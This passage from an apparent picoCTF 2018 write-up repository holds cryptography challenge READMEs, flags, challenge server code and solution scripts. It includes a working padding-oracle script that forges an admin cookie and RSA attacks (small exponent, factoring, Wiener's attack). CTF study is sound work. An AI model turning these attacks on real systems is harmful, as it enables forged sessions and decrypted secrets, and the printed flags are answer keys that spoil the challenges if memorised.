`bab23fa6e34b02b1b4279bf85d89e03e4d8fc9cc9dee572b7c40c9c710f27426437ce07b7d4356c9a97dff9840209d50c9b18d4547f557437fe70d5c62f66283590c5cdaf042515720b8879e43de91e4cafebabecafebabecafebabecafebabe`\n\nIn order to encrypt it without the key, we can use the padding oracle attack to make a decryption oracle. This decryption oracle is able to take in a ciphertext block and output the corresponding decrypted ciphertext block.\n\nWe are able to do this by submitting 2 ciphertext blocks. The first is the IV, which we will use to brute force the decrypted ciphertext block, and the second is the actual ciphertext block.\n\nWe try all bytes (`0x00` to `0xff`) on the last byte of the IV until we get a valid padding response (in this case, the server would respond with an error from `json.loads()` because what was being submitted is not a valid JSON string).\n\nBecause we know the padding bytes (`0x01`, `0x02 0x02`, ... `0x0f 0x0f ... 0x0f`, `0x10 0x10 ... 
0x10`), we can continue with the 2nd last byte all the way until the first byte to figure out what the decrypted ciphertext is.\n\nBy using the decryption oracle, we can encrypt the JSON string by working from the back of the plaintext string (properly padded, split into 16 byte blocks) by setting the last ciphertext block as an arbitrary 16 byte ciphertext block (I used `0xcafebabecafebabecafebabecafebabe`).\n\nThen by XOR-ing the decrypted ciphertext block and the last 16 bytes of the plaintext, we can get the previous ciphertext block. We can repeat this all the way from the back until we get to the first ciphertext block (the IV).\n\nThen we concatenate the IV and all the ciphertext blocks and submit it to the server, which will decrypt into the JSON string and return the flag.\n\n#### Note\n\nFor some reason the communication with the server is really slow. I am not sure whether it is a limitation of the nclib library, but as a result each 16 byte block takes ~1 hour to decrypt.\n\nHence encrypting the entire JSON string takes around 4 hours because it's 4 blocks long.\n\n### Flag\n`picoCTF{0r4cl3s_c4n_l34k_c644af03}`\n"
  },
  {
    "path": "Cryptography/Magic Padding Oracle/files/pkcs7.py",
    "content": "#!/usr/bin/python2\nimport os\nimport json\nimport sys\nimport time\n\nfrom Crypto.Cipher import AES\n\ncookiefile = open(\"cookie\", \"r\").read().strip()\nflag = open(\"flag\", \"r\").read().strip()\nkey = open(\"key\", \"r\").read().strip()\n\nwelcome = \"\"\"\nWelcome to Secure Encryption Service version 1.63\n\"\"\"\ndef pad(s):\n  return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)\n\ndef isvalidpad(s):\n  return ord(s[-1])*s[-1:]==s[-ord(s[-1]):]\n\ndef unpad(s):\n  return s[:-ord(s[len(s)-1:])]\n\ndef encrypt(m):\n  IV=\"This is an IV456\"\n  cipher = AES.new(key.decode('hex'), AES.MODE_CBC, IV)\n  return IV.encode(\"hex\")+cipher.encrypt(pad(m)).encode(\"hex\")\n\ndef decrypt(m):\n  cipher = AES.new(key.decode('hex'), AES.MODE_CBC, m[0:32].decode(\"hex\"))\n  return cipher.decrypt(m[32:].decode(\"hex\"))\n  \n\n# flush output immediately\nsys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)\nprint welcome\nprint \"Here is a sample cookie: \" + encrypt(cookiefile)\n\n# Get their cookie\nprint \"What is your cookie?\"\ncookie2 = sys.stdin.readline()\n# decrypt, but remove the trailing newline first\ncookie2decoded = decrypt(cookie2[:-1])\n\nif isvalidpad(cookie2decoded):\n   d=json.loads(unpad(cookie2decoded))\n   print \"username: \" + d[\"username\"]\n   print \"Admin? \" + d[\"is_admin\"]\n   exptime=time.strptime(d[\"expires\"],\"%Y-%m-%d\")\n   if exptime > time.localtime():\n      print \"Cookie is not expired\"\n   else:\n      print \"Cookie is expired\"\n   if d[\"is_admin\"]==\"true\" and exptime > time.localtime():\n      print \"The flag is: \" + flag\nelse:\n   print \"invalid padding\"\n"
  },
  {
    "path": "Cryptography/Magic Padding Oracle/solution/requirements.txt",
    "content": "nclib"
  },
  {
    "path": "Cryptography/Magic Padding Oracle/solution/solution.py",
    "content": "import nclib, sys, binascii\n\n# Generate all 256 binary combinations of 1 byte\nbyte_combinations = []\nfor i in range(0, 256):\n    i = hex(i)[2:]\n    byte_combinations.append('0' + i if len(i) == 1 else i)\n\n# Add zeros to the front of hex string.\ndef add_zeros(string, desired_length):\n    while len(string) < desired_length:\n        string = '0' + string\n    return string\n\n# Uses the padding oracle to return the decrypted hex string of the input cipherblock\ndef decrypt_ciphertext(cipherblock):\n    # Queries the server and submits the ciphertext\n    # If invalid padding, return False. Else True (might be buggy if input is wrongly formatted)\n    def check_pad(s: str) -> bool:\n        print(s[:32]) # Print the IV\n        nc = nclib.Netcat(connect = ('2018shell1.picoctf.com', 27533), verbose = False)\n        nc.settimeout(2)\n\n        # Receive the first 2 messages given by the server\n        nc.recv()\n        nc.recv()\n\n        # Send the cipherblocks with new line char behind to signify the end of the input\n        nc.send(s.encode() + b'\\n')\n\n        # Receive data\n        data = nc.recv(100000)\n        if b'invalid padding' in data:\n            return False\n        else:\n            print(data) # Make sure data is error about JSON string\n            return True\n    \n    decrypted_cipherblock = ''\n    for i in range(1, 17): # Block length is 128 bits = 16 bytes\n        # Try all combination of bits\n        for byte in byte_combinations:\n            found = False\n\n            iv_prime = '0' * (32 - i * 2) + byte\n            if i != 1: # Account for the padding for 2nd byte onwards\n                # Get the values required to achieve the back padding by XOR-ing the pad with the known D(C)\n                pad = (byte_combinations[i] * (i - 1))\n                padding_for_iv = hex(int(pad, base=16) ^ int(decrypted_cipherblock, base=16))[2:]\n                padding_for_iv = add_zeros(padding_for_iv, 
len(pad))\n                iv_prime += padding_for_iv\n\n            # Send to padding oracle\n            res = check_pad(iv_prime + cipherblock)\n            if res == True: # Correct padding obtained, calculate D(C)'s byte\n                val = int(byte_combinations[i], base=16) ^ int(byte, base=16)\n                val = hex(val)[2:]\n                decrypted_cipherblock = '0' + val + decrypted_cipherblock if len(val) == 1 else val + decrypted_cipherblock\n                found = True\n                break\n\n        # If all 256 bytes have been exhausted without a valid padding, then something went wrong.\n        if found == False:\n            print('Error - couldn\\'t find proper padding.')\n            return\n    return decrypted_cipherblock\n\n# Encrypts a given plaintext by using the padding oracle attack as a decryption oracle.\ndef encrypt_plaintext(plaintext):\n    # Splits input string into blocks of 16 bytes and pads the last block according to PKCS #7\n    def split_input_string(input_string):\n        BLOCK_LENGTH = 16 # 16 bytes\n        splitted_input_string = []\n\n        # Split into blocks of 16 bytes\n        for _ in range(len(input_string) // BLOCK_LENGTH):\n            splitted_input_string.append(input_string[:BLOCK_LENGTH])\n            input_string = input_string[BLOCK_LENGTH:]\n        \n        # Pad the last block\n        padding_required = BLOCK_LENGTH - len(input_string)\n        padding_required = '0' + hex(padding_required)[2:] if len(hex(padding_required)[2:]) == 1 else hex(padding_required)[2:]\n        while len(input_string) < BLOCK_LENGTH:\n            input_string += binascii.unhexlify(padding_required.encode())\n        \n        # Append to output array of blocks of 16 bytes and return\n        splitted_input_string.append(input_string)\n        return splitted_input_string\n    \n    # Get 16 byte blocks of the plaintext\n    plaintext = split_input_string(plaintext.encode())\n    arbitrary_ciphertext_block = 
'cafebabecafebabecafebabecafebabe'\n\n    # Ciphertext should end with this arbitrary block\n    ciphertext = [arbitrary_ciphertext_block]\n\n    # Get blocks from the back of the plaintext\n    current_cipher_block = arbitrary_ciphertext_block\n    for block in plaintext[::-1]:\n        # Get D(C_n)\n        current_decrypted_block = decrypt_ciphertext(current_cipher_block)\n\n        # Get C_n-1 by XOR-ing with plaintext block\n        previous_cipher_block = int.from_bytes(block, byteorder='big') ^ int(current_decrypted_block, base=16)\n        previous_cipher_block = hex(previous_cipher_block)[2:]\n        previous_cipher_block = add_zeros(previous_cipher_block, 32)\n\n        ciphertext.append(previous_cipher_block) # Append to ciphertext\n        current_cipher_block = previous_cipher_block # Make prev cipherblock current cipherblock\n\n    return ciphertext\n\nplaintext = '{\"username\": \"cafebabe!\",\"is_admin\": \"true\",\"expires\": \"2020-1-1\"}'\nciphertext = encrypt_plaintext(plaintext)\n\n# Print out ciphertext\nfor block in ciphertext[::-1]:\n    print(block, end=' ')\n"
  },
  {
    "path": "Cryptography/Safe RSA/README.md",
    "content": "# Safe RSA\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>Now that you know about RSA can you help us decrypt this [ciphertext](files/ciphertext)? We don't have the decryption key but something about those values looks funky..  \n\n### Hint\n>RSA [tutorial](https://en.wikipedia.org/wiki/RSA_(cryptosystem))\n>\n>Hmmm that e value looks kinda small right?\n>\n>These are some really big numbers.. Make sure you're using functions that don't lose any precision!\n\n## Solution\nSince _n_ is really huge and _e_ is really tiny, we can figure out the message without needing to factorise _n_!\n\nWe can assume that `m ** e < n`. Therefore we do a cube root on _c_, and convert the value into ascii.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{e_w4y_t00_sm411_81b6559f}`\n"
  },
  {
    "path": "Cryptography/Safe RSA/files/ciphertext",
    "content": "\nN: 374159235470172130988938196520880526947952521620932362050308663243595788308583992120881359365258949723819911758198013202644666489247987314025169670926273213367237020188587742716017314320191350666762541039238241984934473188656610615918474673963331992408750047451253205158436452814354564283003696666945950908549197175404580533132142111356931324330631843602412540295482841975783884766801266552337129105407869020730226041538750535628619717708838029286366761470986056335230171148734027536820544543251801093230809186222940806718221638845816521738601843083746103374974120575519418797642878012234163709518203946599836959811\ne: 3\n\nciphertext (c): 2205316413931134031046440767620541984801091216351222789180582564557328762455422721368029531360076729972211412236072921577317264715424950823091382203435489460522094689149595951010342662368347987862878338851038892082799389023900415351164773 \n"
  },
  {
    "path": "Cryptography/Safe RSA/solution/solve.py",
    "content": "#!/usr/bin/python\n\nfrom gmpy2 import *\n\nget_context().precision=500\n\nc = mpq(2205316413931134031046440767620541984801091216351222789180582564557328762455422721368029531360076729972211412236072921577317264715424950823091382203435489460522094689149595951010342662368347987862878338851038892082799389023900415351164773, 1)\n\nprint str(hex(int(cbrt(c))))[2:-1].decode('hex')"
  },
  {
    "path": "Cryptography/SpyFi/README.md",
    "content": "# SpyFi\nPoints: 300\n\n## Category\nCryptography\n\n## Question\n>James Brahm, James Bond's less-franchised cousin, has left his secure communication with HQ running, but we couldn't find a way to steal his agent identification code. Can you? Conect with `nc 2018shell1.picoctf.com 30399`. [Source](files/spy_terminal_no_flag.py). \n\n### Hint\n>What mode is being used?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Cryptography/SpyFi/files/spy_terminal_no_flag.py",
    "content": "#!/usr/bin/python2 -u\nfrom Crypto.Cipher import AES\n\nagent_code = \"\"\"flag\"\"\"\n\ndef pad(message):\n    if len(message) % 16 != 0:\n        message = message + '0'*(16 - len(message)%16 )\n    return message\n\ndef encrypt(key, plain):\n    cipher = AES.new( key.decode('hex'), AES.MODE_ECB )\n    return cipher.encrypt(plain).encode('hex')\n\nwelcome = \"Welcome, Agent 006!\"\nprint welcome\n\nsitrep = raw_input(\"Please enter your situation report: \")\nmessage = \"\"\"Agent,\nGreetings. My situation report is as follows:\n{0}\nMy agent identifying code is: {1}.\nDown with the Soviets,\n006\n\"\"\".format( sitrep, agent_code )\n\nmessage = pad(message)\nprint encrypt( \"\"\"key\"\"\", message )\n"
  },
  {
    "path": "Cryptography/Super Safe RSA/README.md",
    "content": "# Super Safe RSA\nPoints: 350\n\n## Category\nCryptography\n\n## Question\n>Dr. Xernon made the mistake of rolling his own crypto.. Can you find the bug and decrypt the message? Connect with `nc 2018shell1.picoctf.com 6262`.  \n\n### Hint\n>Just try the first thing that comes to mind.\n\n## Solution\nThe first thing that comes to mind is to factorise _n_, to get the totient, and generate the private key. We use [msieve](https://sourceforge.net/projects/msieve/) as our factorising tool.\n\nJust factorise the primes, and get _p_ and _q_. A Python script is needed to decrypt the ciphertext and get the flag\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{us3_l@rg3r_pr1m3$_2711}`\n"
  },
  {
    "path": "Cryptography/Super Safe RSA/solution/ciphertext",
    "content": "c: 7929011382767041584510203527859505899601572024468762886720475415218105799874362\nn: 11930191517420424428458862771846268087893161863249464023139623203854660066472157\ne: 65537\n"
  },
  {
    "path": "Cryptography/Super Safe RSA/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom gmpy2 import *\n\nc = 7929011382767041584510203527859505899601572024468762886720475415218105799874362\nn = 11930191517420424428458862771846268087893161863249464023139623203854660066472157\ne = 65537\n\np = 92027970011808537690210426025129587299\nq = 129636582398694722475936463924386691191743\n\ndef eea(a,b):\n\tif b==0:return (1,0)\n\t(q,r) = (a//b,a%b)\n\t(s,t) = eea(b,r)\n\treturn (t, s-(q*t) )\n\ndef find_inverse(x,y):\n\tinv = eea(x,y)[0]\n\tif inv < 1: inv += y #we only want positive values\n\treturn inv\n\ntotient = (p - 1) * (q - 1)\n\nd = find_inverse(e, totient)\nflag = powmod(c, d, n)\n\nprint hex(flag)[2:].decode('hex')\n"
  },
  {
    "path": "Cryptography/Super Safe RSA 2/README.md",
    "content": "# Super Safe RSA 2\nPoints: 425\n\n## Category\nCryptography\n\n## Question\n>Wow, he made the exponent really large so the encryption MUST be safe, right?! Connect with `nc 2018shell1.picoctf.com 56543`. \n\n### Hint\n>What is the usual value for e?\n\n## Solution\nWorking solution [solve.py](solution/solve.py).\n\n### Flag\n`picoCTF{w@tch_y0ur_Xp0n3nt$_c@r3fu11y_2104643}`\n"
  },
  {
    "path": "Cryptography/Super Safe RSA 2/solution/ciphertext",
    "content": "c: 87973714357981711192552122844931994201928929629523523402698449229349318496325838631069992408358538609456707487292932430988908376333690020467856573339571710564864261213347859858094994302558444565941871798549199610810852463994468365272979667205962334739912686073389255122096601393196371860158722056997802747144\nn: 123011419727242929605859484379712787224119427868122185028414426038747211967728126687082223191959583800124030930442533997557997625495312608148837196827665382944411142837816321635710707548473070155845149369804586838545770200114861944189730393681376431146673015470955622822572616394605670811484761576817673309001\ne: 20370827750732677953101194500404700852089173301382884082478321647291201786559551992537091540692087873762090234342322985115231826746732803397154738501467143140654322623572067396058860233911575260540468106570172920030157403146163826401598627492164762337650828047117823273414399019740348998847585859920303350373\n"
  },
  {
    "path": "Cryptography/Super Safe RSA 2/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom gmpy2 import *\nfrom wienerAttack.RSAwienerHacker import *\n\nN = 123011419727242929605859484379712787224119427868122185028414426038747211967728126687082223191959583800124030930442533997557997625495312608148837196827665382944411142837816321635710707548473070155845149369804586838545770200114861944189730393681376431146673015470955622822572616394605670811484761576817673309001\n\nC = 87973714357981711192552122844931994201928929629523523402698449229349318496325838631069992408358538609456707487292932430988908376333690020467856573339571710564864261213347859858094994302558444565941871798549199610810852463994468365272979667205962334739912686073389255122096601393196371860158722056997802747144\n\nE = 20370827750732677953101194500404700852089173301382884082478321647291201786559551992537091540692087873762090234342322985115231826746732803397154738501467143140654322623572067396058860233911575260540468106570172920030157403146163826401598627492164762337650828047117823273414399019740348998847585859920303350373\n\nd = hack_RSA(E, N)\n\nprint hex(powmod(C, d, N))[2:].decode('hex')"
  },
  {
    "path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/Arithmetic.py",
    "content": "'''\nCreated on Dec 22, 2011\n\n@author: pablocelayes\n'''\n\ndef egcd(a,b):\n    '''\n    Extended Euclidean Algorithm\n    returns x, y, gcd(a,b) such that ax + by = gcd(a,b)\n    '''\n    u, u1 = 1, 0\n    v, v1 = 0, 1\n    while b:\n        q = a // b\n        u, u1 = u1, u - q * u1\n        v, v1 = v1, v - q * v1\n        a, b = b, a - q * b\n    return u, v, a\n\ndef gcd(a,b):\n    '''\n    2.8 times faster than egcd(a,b)[2]\n    '''\n    a,b=(b,a) if a<b else (a,b)\n    while b:\n        a,b=b,a%b\n    return a\n\ndef modInverse(e,n):\n    '''\n    d such that de = 1 (mod n)\n    e must be coprime to n\n    this is assumed to be true\n    '''\n    return egcd(e,n)[0]%n\n\ndef totient(p,q):\n    '''\n    Calculates the totient of pq\n    '''\n    return (p-1)*(q-1)\n\ndef bitlength(x):\n    '''\n    Calculates the bitlength of x\n    '''\n    assert x >= 0\n    n = 0\n    while x > 0:\n        n = n+1\n        x = x>>1\n    return n\n\n\ndef isqrt(n):\n    '''\n    Calculates the integer square root\n    for arbitrary large nonnegative integers\n    '''\n    if n < 0:\n        raise ValueError('square root not defined for negative numbers')\n    \n    if n == 0:\n        return 0\n    a, b = divmod(bitlength(n), 2)\n    x = 2**(a+b)\n    while True:\n        y = (x + n//x)//2\n        if y >= x:\n            return x\n        x = y\n\n\ndef is_perfect_square(n):\n    '''\n    If n is a perfect square it returns sqrt(n),\n    \n    otherwise returns -1\n    '''\n    h = n & 0xF; #last hexadecimal \"digit\"\n    \n    if h > 9:\n        return -1 # return immediately in 6 cases out of 16.\n\n    # Take advantage of Boolean short-circuit evaluation\n    if ( h != 2 and h != 3 and h != 5 and h != 6 and h != 7 and h != 8 ):\n        # take square root if you must\n        t = isqrt(n)\n        if t*t == n:\n            return t\n        else:\n            return -1\n    \n    return -1\n\n#TEST functions\n\ndef test_is_perfect_square():\n    
print(\"Testing is_perfect_square\")\n    testsuit = [4, 0, 15, 25, 18, 901, 1000, 1024]\n    \n    for n in testsuit:\n        print(\"Is \", n, \" a perfect square?\")\n        if is_perfect_square(n)!= -1:\n            print(\"Yes!\")\n        else:\n            print(\"Nope\")\n\nif __name__ == \"__main__\":\n    test_is_perfect_square()"
  },
  {
    "path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/ContinuedFractions.py",
    "content": "'''\nCreated on Dec 14, 2011\n\n@author: pablocelayes\n    \n'''\n\ndef rational_to_contfrac (x, y):\n    ''' \n    Converts a rational x/y fraction into\n    a list of partial quotients [a0, ..., an] \n    '''\n    a = x//y\n    if a * y == x:\n        return [a]\n    else:\n        pquotients = rational_to_contfrac(y, x - a * y)\n        pquotients.insert(0, a)\n        return pquotients\n\n#TODO: efficient method that calculates convergents on-the-go, without doing partial quotients first    \ndef convergents_from_contfrac(frac):    \n    '''\n    computes the list of convergents\n    using the list of partial quotients \n    '''\n    convs = [];\n    for i in range(len(frac)):\n        convs.append(contfrac_to_rational(frac[0:i]))\n    return convs\n\ndef contfrac_to_rational (frac):\n    '''Converts a finite continued fraction [a0, ..., an]\n     to an x/y rational.\n     '''\n    if len(frac) == 0:\n        return (0,1)\n    elif len(frac) == 1:\n        return (frac[0], 1)\n    else:\n        remainder = frac[1:len(frac)]\n        (num, denom) = contfrac_to_rational(remainder)\n        # fraction is now frac[0] + 1/(num/denom), which is \n        # frac[0] + denom/num.\n        return (frac[0] * num + denom, num)\n\ndef test1():\n    '''\n    Verify that the basic continued-fraction manipulation stuff works.\n    '''\n    testnums = [(1, 1), (1, 2), (5, 15), (27, 73), (73, 27)]\n    for r in testnums:\n        (num, denom) = r\n        print('rational number:')\n        print(r)\n        \n        contfrac = rational_to_contfrac (num, denom)\n        print('continued fraction:')\n        print(contfrac)\n        \n        print('convergents:')\n        print(convergents_from_contfrac(contfrac))\n        print('***********************************')\n    \nif __name__ == \"__main__\":\n    test1()"
  },
  {
    "path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/RSAwienerHacker.py",
    "content": "'''\nCreated on Dec 14, 2011\n\n@author: pablocelayes\n'''\n\nimport ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator\n\ndef hack_RSA(e,n):\n    '''\n    Finds d knowing (e,n)\n    applying the Wiener continued fraction attack\n    '''\n    frac = ContinuedFractions.rational_to_contfrac(e, n)\n    convergents = ContinuedFractions.convergents_from_contfrac(frac)\n    \n    for (k,d) in convergents:\n        \n        #check if d is actually the key\n        if k!=0 and (e*d-1)%k == 0:\n            phi = (e*d-1)//k\n            s = n - phi + 1\n            # check if the equation x^2 - s*x + n = 0\n            # has integer roots\n            discr = s*s - 4*n\n            if(discr>=0):\n                t = Arithmetic.is_perfect_square(discr)\n                if t!=-1 and (s+t)%2==0:\n                    print(\"Hacked!\")\n                    return d\n\n# TEST functions\n\ndef test_hack_RSA():\n    print(\"Testing Wiener Attack\")\n    times = 5\n    \n    while(times>0):\n        e,n,d = RSAvulnerableKeyGenerator.generateKeys(1024)\n        print(\"(e,n) is (\", e, \", \", n, \")\")\n        print(\"d = \", d)\n    \n        hacked_d = hack_RSA(e, n)\n    \n        if d == hacked_d:\n            print(\"Hack WORKED!\")\n        else:\n            print(\"Hack FAILED\")\n        \n        print(\"d = \", d, \", hacked_d = \", hacked_d)\n        print(\"-------------------------\")\n        times -= 1\n    \nif __name__ == \"__main__\":\n    #test_is_perfect_square()\n    #print(\"-------------------------\")\n    test_hack_RSA()\n\n\n    \n\n\n        \n    \n"
  },
  {
    "path": "Cryptography/Super Safe RSA 2/solution/wienerAttack/__init__.py",
    "content": ""
  },
  {
    "path": "Cryptography/Super Safe RSA 3/README.md",
    "content": "# Super Safe RSA 3 \nPoints: 600\n\n## Category\nCryptography\n\n## Question\n>The more primes, the safer.. right.?.? Connect with `nc 2018shell1.picoctf.com 11423`. \n\n### Hint\n>How would you find d if there are more than 2 prime factors of n?\n\n## Solution\nUse msieve to install to factorise the primes\n\nCalculate the totient by doing `(prime_1 - 1) * (prime_2 - 1) ... (prime_n - 1)` where `n` is the total number of primes\n\nReconstruct the private key, and decrypt the message\n\nRecommended reads: https://crypto.stackexchange.com/questions/44110/rsa-with-3-primes\n\n### Flag\n`picoCTF{p_&_q_n0_r_$_t!!_6629910}`\n"
  },
  {
    "path": "Cryptography/Super Safe RSA 3/solution/ciphertext",
    "content": "c: 38267717521783805358997028434192574072066206734150058806702039241540545591327160817138103308778806260550691278229033409184518095836671759886018797380100194106653804590171378094033599430892604979401307896519429546854583917860199582081050782350831478073093769585362279610973195866544327315887867433642490547\nn: 40795360971651974271650711440993964050307855147720011233981545415438122680764985969049700071051749071781096004576107493076004911609956646026586641164708122628888234552831947705825820830717771374968853614494573673171451401812260688186915972782495102601063537646203830376891448685264916094254020958827455069\ne: 65537\n"
  },
  {
    "path": "Cryptography/Super Safe RSA 3/solution/solve.py",
    "content": "#!/usr/bin/python\nfrom gmpy2 import *\n\nn = 40795360971651974271650711440993964050307855147720011233981545415438122680764985969049700071051749071781096004576107493076004911609956646026586641164708122628888234552831947705825820830717771374968853614494573673171451401812260688186915972782495102601063537646203830376891448685264916094254020958827455069\n\nc = 38267717521783805358997028434192574072066206734150058806702039241540545591327160817138103308778806260550691278229033409184518095836671759886018797380100194106653804590171378094033599430892604979401307896519429546854583917860199582081050782350831478073093769585362279610973195866544327315887867433642490547\n\ne = 65537\n\nprimes = [\n\t2408536589,\n\t2613433873,\n\t2646493621,\n\t2666585221,\n\t2670389531,\n\t2683499473,\n\t2685364093,\n\t2741484497,\n\t2863351783,\n\t2886722177,\n\t2925436511,\n\t3064431973,\n\t3108375629,\n\t3148348271,\n\t3266962103,\n\t3274199927,\n\t3340290809,\n\t3347444599,\n\t3358514681,\n\t3521655793,\n\t3548118169,\n\t3874420523,\n\t3896780983,\n\t3957297011,\n\t3993894323,\n\t4051778999,\n\t4079155009,\n\t4079785417,\n\t4111436137,\n\t4137823787,\n\t4173914051,\n\t4186089221\n]\n\ntotient = 1\n\nfor i in primes:\n\ttotient *= (i - 1)\n\nassert gcd(e, totient) == 1\n\nd = invert(e, totient)\n\nget_context().precision=1000\n\nm = powmod(c, d, n)\n\nprint str(hex(int(m)))[2:-1].decode('hex')\n"
  },
  {
    "path": "Cryptography/blaise's cipher/README.md",
    "content": "# blaise's cipher\nPoints: 200\n\n## Category\nCryptography\n\n## Question\n>My buddy Blaise told me he learned about this cool cipher invented by a guy also named Blaise! Can you figure out what it says? Connect with `nc 2018shell1.picoctf.com 46966`. \n\n### Hint\n>There are tools that make this easy.\n>\n>This cipher was NOT invented by Pascal\n\n## Solution\nThis is a Vigenère Cipher, this time without a key. Bruteforce using an online tool. Online tool: https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx\n\n### Flag\n`picoCTF{v1gn3r3_c1ph3rs_ar3n7_bad_cdf08bf0}`\n"
  },
  {
    "path": "Cryptography/blaise's cipher/solution/ciphertext",
    "content": "Encrypted message:\nYse lncsz bplr-izcarpnzjo dkxnroueius zf g uzlefwpnfmeznn cousex bls ltcmaqltki my Rjzn Hfetoxea Gqmexyt axtfnj 1467 fyd axpd g rptgq nivmpr jndc zt dwoynh hjewkjy cousex fwpnfmezx. Llhjcto'x dyyypm uswy ybttimpd gqahggpty fqtkw debjcar bzrjx, lnj xhizhsey bprk nydohltki my cwttosr tnj wezypr uk ehk hzrxjdpusoitl llvmlbky tn zmp cousexypxz. Qltkw, tn 1508, Ptsatsps Zwttnjxiax, tn nnd wuwv Puqtgxfahof, tnbjytki ehk ylbaql rkhea, g hciznnar hzmvtyety zf zmp Volpnkwp cousex. Yse Zwttnjxiax nivmpr, nthebjc, otqj pxtgijjo a vwzgxjdsoap, roltd, gso pxjoiiylbrj dyyypm ltc scnecnnyg hjewkjy cousex fwpnfmezx.\n\nHhgy ts tth ktthn gx ehk Atgksprk htpnjc wgx zroltngqwy jjdcxnmej gj Gotgat Gltzndtg Gplrfdo os siy 1553 gzoq Ql cokca jjw. Sol. Riualn Hfetoxea Hjwlgxz. Hk gfiry fpus ehk ylbaql rkhea uk Eroysesnfs, hze ajipd g wppkfeitl \"noaseexxtgt\" (f vee) yz scnecn htpnjc arusahjes kapre qptzjc. Wnjcegx Llhjcto fyd Zwttnjxiax fski l focpd vfetkwy ol xfbyyttaytotx, Merqlsu'x dcnjxe sjlnz yse vfetkwy ol xfbyyttaytotx noaqo bk jlsoqj cnfygki disuwy hd derjntosr a tjh kkd. Veex hexj eyvnnarqj sosrlk bzrjx zr ymzrz usrgxps, qszwt yz buys pgweikx tn gigathp, ox ycatxxizypd \"uze ol glnj\" fwotl hizm ehk rpsyfre. Hjwlgxz's sjehui ehax cewztrki dtxtyg yjnuxney ltc otqj tnj vee. Fd iz nd rkqltoaple jlse yz skhfrk f dhuwe kkd ahxfde, yfj be f arkatoax aroaltk hznbjcsgytot, Gplrfdo'y xjszjx wgx notxtdkwlbrd xoxj deizce.\n\nHqliyj oe Bnretjce vzmloxsej mts jjdcxnatoty ol f disnwax gft yycotlpr gzeoqjj cousex gpfuwp tnj noawe ol Mpnxd TIO tq Fxfyck, ny 1586. Lgypr, os ehk 19ys ckseuxd, ehk nyvkseius zf Hjwlgxz's inahkw hay rtsgyerogftki eo Bnretjce. Jfgij Plht ny hox moup Ehk Hzdkgcegppry qlmkseej yse sndazycihzeius my yfjitl ehgy siyyzre mld \"olyoxjo tnnd isuzrzfyt itytxnmuznzn gso itxeegi yasjo a xjrrkxdibj lnj jwesjytgwj cousex kzr nnx [Volpnkwp] tntfgn mp hgi yozmtnm yz du bttn ne\". 
pohzCZK{g1gt3w3_n1pn3wd_ax3s7_maj_hof08hk0}\n\nEhk Atgksprk htpnjc ggnyej f cevzeaznzn ltc bknyg kcnevytotfwle xerusr. Nuypd gzehuw lnj rltnjxaznnigs Nhgwwey Qftcnogk Izdmxzn (Rjhiy Hlrxtwl) ifwlki ehk Atgksprk htpnjc utgcegplbrj tn nnd 1868 pojne \"Zmp Arusahje Cousex\" ny a imtljwpn'y rlggetnk. Ny 1917, Sinpnznqii Fxexnnat ipsiwtbki ehk Atgksprk htpnjc ay \"nxpuxdihqp ol ycatxwaznzn\". Zmts xjauzfeius hay szt jjdexapd. Imlrrjd Bggmamj ts qszwt yz hgap bxtvet f gaxnlnz tq tnj nivmpr gx paxqj ay 1854; mzwkapr, nj oijs'e pagwiym siy bzrq. Plsoxvi kseixjwy hwzkk yse inahkw lnj ufbrndhki ehk ypcnstqaj tn zmp 19tn hpnzzcy. Kapn hjqoxj ehox, ehuzrh, ytxe yptlrjo cxdatgsllexes itflj tncgxtotfwle gcegp ehk htpnjc it yse 16zm netyfre.\n\nHcyvyzgxfahoh dloip raqp uyjo ay f narhflgytot ftd hd ehk Xhiyx Lrsd mezbpet 1914 fyd 1940.\nZmp Volpnkwp cousex nd soralk jyoals tu gp a lnplj htpnjc il ne iy zdej ny cusuutheius hizm nivmpr jndky. Yse Ityfkiprgyp Szfeey tq Asjciif, qox jiasuwe, axpd g gcayx nivmpr jndk zt tmvqpmkse tnj Gimjyexj nivmpr jzcitl ehk Fxexnnat Htvoq Hax. Yse Ityfkiprghj's sjdsglps cjce lfc fxtx skhcez fyd zmp Utnzn xjrurfcle hcaippd zmpix rpsyfrey. Ysruzrhuze tnj hax, yse Ityfkiprgyp lkfoexxsiv ucisfcird cernpd auzn zmcek ppy vmcayjd, \"Mgsnhkxeex Gwulk\", \"Nosuwezj Giiyzre\" fyd, gx ehk blr ifxe zt l crtde, \"Itxe Xjerogftoty\".\n\nGoqmexy Gexslm zwtej yz rkulix yse hwzkks nivmpr (iwpaznyg zmp Vkwyas–Atgksprk htpnjc it 1918), gft, tt xazypr cmlt nj oij, yse inahkw hay xeirq gursprggwe zt nreueatfwyynd. Vkwyas'x hoxp, socjgex, jgetyfarqj lki eo zmp otj-eisj aaj, f ehktceznnarqj utgcegplbrj nivmpr.\n\n"
  },
  {
    "path": "Cryptography/caesar cipher 1/README.md",
    "content": "# caesar cipher 1\nPoints: 150\n\n## Category\nCryptography\n\n## Question\n>This is one of the older ciphers in the books, can you decrypt the [message](files/ciphertext)? You can find the ciphertext in /problems/caesar-cipher-1_4_e4dc6dcfb004bdade0b9ce8e44f1bac4 on the shell server. \n\n### Hint\n>caesar cipher [tutorial](https://learncryptography.com/classical-encryption/caesar-cipher)\n\n## Solution\nThis is a simple caesar cipher. Online tool: https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript\n\n### Flag\n`picoCTF{justagoodoldcaesarciphertobrvmri}`\n"
  },
  {
    "path": "Cryptography/caesar cipher 1/files/ciphertext",
    "content": "picoCTF{domnuaiixifxwuymulwcjbylnivlpglc}"
  },
  {
    "path": "Cryptography/caesar cipher 2/README.md",
